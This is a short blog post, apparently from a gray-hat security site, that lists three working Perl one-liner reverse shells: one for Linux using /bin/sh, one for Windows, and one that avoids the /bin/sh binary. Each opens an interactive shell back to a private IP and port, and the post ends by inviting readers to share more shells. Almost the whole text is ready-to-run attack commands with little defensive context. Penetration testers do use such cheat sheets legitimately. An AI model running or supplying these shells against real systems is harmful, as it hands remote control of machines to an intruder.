Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.
Perl Reverse Shells
If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.
A linux reverse shell using /bin/sh
perl -e 'use Socket; $i="172.16.16.5"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR, ">&S"); exec("/bin/sh -i");};'
A Windows reverse shell using Perl
It’s actually not uncommon to find perl installed on Windows Servers
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);$_ while<>;'
Perl reverse shell without using /bin/sh
Perl is so versatile that we can do some amazing things with it. Watch us spawn a reverse shell without using a binary!
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Feel free to comment, if you’ve got some more reverse shells. We do have moderation enabled, but we’re pretty lenient with the content here, at Gray Hat Freelancing.
